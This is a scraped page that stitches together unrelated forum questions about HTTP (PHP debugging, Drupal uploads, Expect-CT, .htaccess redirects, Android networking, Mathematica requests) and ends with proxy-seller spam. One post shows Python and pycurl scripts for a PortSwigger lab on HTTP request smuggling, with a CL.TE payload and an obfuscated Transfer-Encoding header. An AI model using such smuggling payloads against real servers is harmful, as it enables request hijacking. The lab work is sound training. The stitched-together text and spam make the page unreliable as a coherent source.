Recibir en PHP, con un debugger data desde una aplicacion android (java) que envia por http

Actualmente tengo un servidor php y una aplicacion java en Android funcionando perfecto (digamos)
Estoy usando para enviar parametros desde android http, y como IDE en PHP “eclipse”

Queria saber si es posible, o si existe alguna otro IDE en vez de eclipse que pueda recibir a traves de una envio http desde android, (como actualmente lo hago con eclipse), y poder asi debuggear el servidor.

upload image error "An Ajax http request terminated abnormally.." on Google Chrome [closed]

My website i use Drupal 7.69

I use Google Chrome Version 83.0.4103.61 (Official Build) (64-bit)

when upload image it’s show

https://ibb.co/wR0wVr0

And click “Remove”

https://ibb.co/M9rj222

But i use Safari not have error.

certificates – Adding Expect-CT header to HTTP response

In the security test report, I have a recommendation to add Expect-CT header to the HTTP response from web application, additionally developers set this to:

Expect-CT: max-age=0, report-uri=

I am not sure if it is a good idea to add this header. According to https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT:

“The Expect-CT will likely become obsolete in June 2021. Since May 2018 new certificates are expected to support SCTs by default. Certificates before March 2018 were allowed to have a lifetime of 39 months, those will all be expired in June 2021.”

So because certificates are expected to support SCTs by default I do not think that this header makes any sense.

When it comes to configuration according to https://scotthelme.co.uk/a-new-security-header-expect-ct/ max-age=0, report-uri= means:

“This policy is deployed in report-only mode and if the browser doesn’t receive CT information that it’s happy with, referred to as not being ‘CT Qualified’, rather than terminate the connection it will simply send a report to the specified report-uri value.”

Because I don’t have uri here, the report will not be sent, so there is no additional security at all.

On the other hand I see that some popular websites like Linkedin still use this header, the example from Linkedin:

Expect-CT: max-age=86400, report-uri="https://www.linkedin.com/platform-telemetry/ct"

HTTP servers | Web Hosting Talk

HTTP servers | Web Hosting Talk


‘);
var sidebar_align = ‘right’;
var content_container_margin = parseInt(‘350px’);
var sidebar_width = parseInt(‘330px’);
//–>









  1. HTTP servers


    why I cant run Apache with ruby,is there a way it could handle it?















  2. Ruby DOES work with Apache. You need to give us more information about your configuration and the error you’re getting which leads you to conclude that you can’t run Apache and Ruby – What do your logs say?

    Linux Shared Hosting • Cloud & Dedicated Servers • Custom Colocation & Rackspace
    NVMe & SSD Storage • Additional IP v4/v6 • 24/7 Dedicated Support • Email: contact@rhc-hosting.com • Web: www.rhc-hosting.com









Similar Threads


  1. Replies: 103


    Last Post: 04-13-2006, 10:21 PM


  2. Replies: 0


    Last Post: 01-12-2006, 08:30 PM


  3. Replies: 12


    Last Post: 07-19-2005, 01:28 AM


  4. Replies: 4


    Last Post: 10-26-2000, 01:24 PM



Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  








http proxy – Burp not intercepting live video stream

I have set up Burp proxy to intercept requests of an Android app. I am able to intercept app API calls except for live video streams. I am not aware of how the video stream is implemented but assuming there should be WebSocket or HTTP requests made to stream video.

Please help me how can I intercept live streaming. My aim is to stream video on a laptop.

java – Return Http Response to the Main thread an start new activity (intent) using Loopj implementation

I am pretty new to Java programming.
I am doing a Http Request with Async using the implementation Loopj (com.loopj.android:android-async-http:1.4.9).

The OnSuccess and OnFailure of the AsyncHttpResponseHandler are working fine.

New I want to return the HttpRespone the Main thread and display it on a new Activity (intent).

I found the method „public void onPostProcessResponse“ but the description tells the following:
„Please note: post-processing does NOT run on the main thread, and thus any UI activities that you must perform should be properly dispatched to the app’s UI thread.“
(https://loopj.com/android-async-http/doc/com/loopj/android/http/AsyncHttpResponseHandler.html)

I really appreciate any help!!

Here is the code:

enter code herepackage com.example.myapplication;

enter code hereimport androidx.appcompat.app.AppCompatActivity;

enter code hereimport android.content.Intent;

import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;

import com.loopj.android.http.AsyncHttpClient;
import com.loopj.android.http.AsyncHttpResponseHandler;
import com.loopj.android.http.ResponseHandlerInterface;

import cz.msebera.android.httpclient.Header;
import cz.msebera.android.httpclient.HttpResponse;

    public class HttpRequest extends AppCompatActivity {

    private TextView eMail;
    private Button CallWebService;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_http_request);

        eMail = (TextView) findViewById(R.id.textView);
        CallWebService = (Button) findViewById(R.id.call_webservice);


        Intent get_Email = getIntent(); //
        String eMail_address = getIntent().getStringExtra("id_Email");
        eMail.setText(eMail_address);


        CallWebService.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {

            String url = "https://jsonplaceholder.typicode.com/posts/1"; //genutzte Bib:  implementation 'com.loopj.android:android-async-http:1.4.9'

            new AsyncHttpClient().get(url, new AsyncHttpResponseHandler() {
                @Override
                public void onSuccess(int statusCode, Header() headers, byte() responseBody) {
                    String urlResponse = new String(responseBody);
                    CallWebService.setText(urlResponse); 

                    //String currentString = urlResponse;
                    //String () separated =  currentString.split(",");
                    //CallWebService.setText(separated(1));


                }

                @Override
                public void onFailure(int statusCode, Header() headers, byte() responseBody, Throwable error) {
                    CallWebService.setText("Error"); //response Body: Enthält die Antwort der URL Abfrage in Byte -> Umwandlung in string nötig
                }
            });

            }
        });

    }


}

All the best,
Simon

htaccess – All pages are not being redirected to HTTPS when accessed using HTTP

I’m running a WordPress blog that has an issue with HTTPS redirect. Except home page, no other URL is being redirected to HTTPS if you visit via HTTP.

I want to redirect all HTTP traffic to HTTPS. Currently, only the Home page(http://www.example.com) is being redirected to HTTPS if you try with HTTP.

but if you visit http://www.example.com/page1, then it won’t be redirected to HTTPS and stays at HTTP.

I don’t want to use any plugin such as “really simple SSL”. After a lil’bit of searching over net, I found that I can modify the .htaccess file to do that. Then I tried to understand .htaccess file (considering I never worked with PHP or WordPress or even Apache before). I got to know that RewriteEngine On should appear only once in your file but in my case, it’s appearing twice. maybe some plugin or theme had modified this that i’m not aware of. below is the content of my .htaccess file.

# BEGIN WordPress
# The directives (lines) between `BEGIN WordPress` and `END WordPress` are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_expires.c>
    ExpiresActive On
    ExpiresByType image/jpg "access plus 24 hours"
    ExpiresByType image/jpeg "access plus 24 hours"
    ExpiresByType image/gif "access plus 24 hours"
    ExpiresByType image/png "access plus 24 hours"
    ExpiresByType text/css "access plus 24 hours"
    ExpiresByType application/pdf "access plus 1 week"
    ExpiresByType text/javascript "access plus 24 hours"
    ExpiresByType text/html "access plus 5 minutes"
    ExpiresByType image/x-icon "access plus 1 year"
    ExpiresDefault "access plus 24 hours"
</IfModule>
<ifModule mod_headers.c>
Header set X-Endurance-Cache-Level "2"
</ifModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - (L)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php (L)
</IfModule>

# END WordPress
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} (L,R=301)

I don’t have any subdomains. only a single domain.
So to clear my doubts, I have two questions.

1) Is this .htaccess file correct? I mean can we have two RewriteEngine On lines? that too outside the , again I’m not very familiar with this syntax.

2) What should I change to reflect HTTPS redirection on all of my pages?

PS: these are one of the links that I have visited-

htaccess

.htaccess syntax multiple RewriteEngine on

https://www.hostinger.com/tutorials/ssl/forcing-https

curl – Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 10
Transfer-Encoding: chunked

0

G 

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $'POST' 
    -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' 
    --data-binary $'0x0dx0ax0dx0aGx0dx0ax0dx0a' 
    $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}

    data = '0x0dx0ax0dx0aGx0dx0a'

    s = requests.Session()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)

    print(response.request.headers)
    print(response.status_code)
    print(response.text)

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X(n)Transfer-Encoding: chunked

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python

import pycurl
from StringIO import StringIO

buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0x0dx0ax0dx0aGx0dx0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, (
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
    ))
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()

body = buffer.getvalue()

print(body)

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying 18.200.141.238:443...                                                                                                                            
* TCP_NODELAY set                                                                                                                                           
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                     
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification OK
*        server certificate status verification SKIPPED
*        common name: web-security-academy.net (matched)
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=web-security-academy.net
*        start date: Fri, 05 Jul 2019 00:00:00 GMT
*        expire date: Wed, 05 Aug 2020 12:00:00 GMT
*        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
< 
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23

"Internal Server Error"

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

http functions – Should HTTPRequest return the same as curl in this case

The following shell script is used to access an IoT device that returns a JSON string, the content of which is not important for this question.

#!/bin/sh
secret= <not_telling>
id="e00fce688e6bcd0bad0763e7"
curl -k "https://api.particle.io/v1/devices/$id/peek" -d access_token=$<not_telling> -d args=5

I would like to reproduce this functionality in Mathematica

(* id and secret have been defined *)
req = HTTPRequest(
  "https://api.particle.io/v1/devices/" <> id <> "/peek",
  <|"Method" -> "POST", 
   "Query" -> {"args" -> "5", "access_token" -> secret}|>)
URLExecute@req

This code does successfully POST; however it behaves as if the “-d args=5” portion of the query is missing or ignored. I’m likely missing something trivial, but cannot place my finger on it.

DreamProxies - Cheapest USA Elite Private Proxies 100 Private Proxies 200 Private Proxies 400 Private Proxies 1000 Private Proxies 2000 Private Proxies ExtraProxies.com - Buy Cheap Private Proxies Buy 50 Private Proxies Buy 100 Private Proxies Buy 200 Private Proxies Buy 500 Private Proxies Buy 1000 Private Proxies Buy 2000 Private Proxies ProxiesLive Proxies-free.com New Proxy Lists Every Day Proxies123